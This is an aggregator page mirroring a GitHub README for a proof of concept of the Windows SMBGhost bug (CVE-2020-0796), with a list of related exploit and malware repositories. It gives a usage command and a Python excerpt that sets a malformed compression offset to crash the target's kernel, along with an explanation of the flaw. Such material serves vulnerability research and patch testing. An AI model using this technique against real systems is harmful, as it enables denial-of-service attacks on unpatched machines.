GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → eerykitty → Cve 2020 0796 Poc

eerykitty / Cve 2020 0796 Poc

Licence: mit
PoC for triggering buffer overflow via CVE-2020-0796

Programming Languages

python
139335 projects - #7 most used programming language

Labels

poc

Projects that are alternatives of or similar to Cve 2020 0796 Poc

Exploits
A personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to be used in conjunction with these exploits.
Stars: ✭ 75 (-71.8%)
Mutual labels:  poc
chrome-spyware
Writing Spyware Made Easy - POC spyware Chrome Extension/Server
Stars: ✭ 25 (-90.6%)
Mutual labels:  poc
awesome-list-of-secrets-in-environment-variables
🦄🔒 Awesome list of secrets in environment variables 🖥️
Stars: ✭ 538 (+102.26%)
Mutual labels:  poc
front-end-visual-comparison-tool
🔮🔬Front-End testing tool which can be used to create a side by side visual comparison between your live site and local site.
Stars: ✭ 16 (-93.98%)
Mutual labels:  poc
Phirautee
A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShell and does not require any third-party libraries. This tool steals the information, holds an organisation’s data to hostage for payments or permanently encrypts/deletes the organisation data.
Stars: ✭ 96 (-63.91%)
Mutual labels:  poc
Cerberus
A complete Grabber, sending data to a TCP server that you have to host and stocking all in a database.
Stars: ✭ 32 (-87.97%)
Mutual labels:  poc
ARL-NPoC
集漏洞验证和任务运行的一个框架
Stars: ✭ 73 (-72.56%)
Mutual labels:  poc
CVE-2018-7750
an RCE (remote command execution) approach of CVE-2018-7750
Stars: ✭ 18 (-93.23%)
Mutual labels:  poc
CVE-2021-44228-PoC-log4j-bypass-words
🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks
Stars: ✭ 760 (+185.71%)
Mutual labels:  poc
DeepfakeHTTP
DeepfakeHTTP is a web server that uses HTTP dumps as a source for responses.
Stars: ✭ 373 (+40.23%)
Mutual labels:  poc
swisscheese
Exploits for YARA 3.7.1 & 3.8.1
Stars: ✭ 26 (-90.23%)
Mutual labels:  poc
CVE-2022-21907-http.sys
Proof of concept of CVE-2022-21907 Double Free in http.sys driver, triggering a kernel crash on IIS servers
Stars: ✭ 67 (-74.81%)
Mutual labels:  poc
CVE-2021-33766
ProxyToken (CVE-2021-33766) : An Authentication Bypass in Microsoft Exchange Server POC exploit
Stars: ✭ 37 (-86.09%)
Mutual labels:  poc
fake-web-events
Creates a Simulation of Fake Web Events
Stars: ✭ 48 (-81.95%)
Mutual labels:  poc
NSE-scripts
NSE scripts to detect CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972, proxyshell, CVE-2021-34473
Stars: ✭ 105 (-60.53%)
Mutual labels:  poc
Scripts-Sploits
A number of scripts POC's and problems solved as pentests move along.
Stars: ✭ 37 (-86.09%)
Mutual labels:  poc
PoC-CVE-2021-41773
No description or website provided.
Stars: ✭ 39 (-85.34%)
Mutual labels:  poc
Tentacle
Tentacle is a POC vulnerability verification and exploit framework. It supports free extension of exploits and uses POC scripts. It supports calls to zoomeye, fofa, shodan and other APIs to perform bulk vulnerability verification for multiple targets.
Stars: ✭ 258 (-3.01%)
Mutual labels:  poc
Exploit-Development
Exploit Development - Weaponized Exploit and Proof of Concepts (PoC)
Stars: ✭ 84 (-68.42%)
Mutual labels:  poc
Pentesting
Misc. Public Reports of Penetration Testing and Security Audits.
Stars: ✭ 24 (-90.98%)
Mutual labels:  poc
View All Similar Projects ➔

CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost

Usage

./CVE-2020-0796.py servername

This script connects to the target host, and compresses the authentication request with a bad offset field set in the transformation header, causing the decompressor to buffer overflow and crash the target.

This contains a modification of the excellent smbprotocol with added support for SMB 3.1.1 compression/decompression (only LZNT1). Most of the additions are in smbprotocol/connection.py. A version of lznt1 is included, modified to support Python 3.

The compression transform header is in the SMB2CompressionTransformHeader class there. The function _compress is called to compress tree requests. This is where the offset field is set all high to trigger the crash.

    def _compress(self, b_data, session):
        header = SMB2CompressionTransformHeader()
        header['original_size'] = len(b_data)
        header['offset'] = 4294967295
        header['data'] = smbprotocol.lznt1.compress(b_data)

About

CVE-2020-0796 is a bug in Windows 10 1903/1909's new SMB3 compression capability. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression cabilities, and to selectively compress SMB3 messages as beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include a SMB2_COMPRESSION_CAPABILITIES as documented in MS-SMB2 2.2.3.1.3.

Once a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages. To do so, the entire SMB packet is compressed, and a transformed header is prepended, as documented in MS-SMB2 2.2.42. This header is a small (16 bytes) structure with a magic value, the uncompressed data size, the compression algorithm used, and an offset value.

CVE-2020-0796 is caused by a lack of bounds checking in that offset size, which is directly passed to several subroutines. Passing a large value in will cause a buffer overflow, and crash the kernel. With further work, this could be developed into a RCE exploit.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].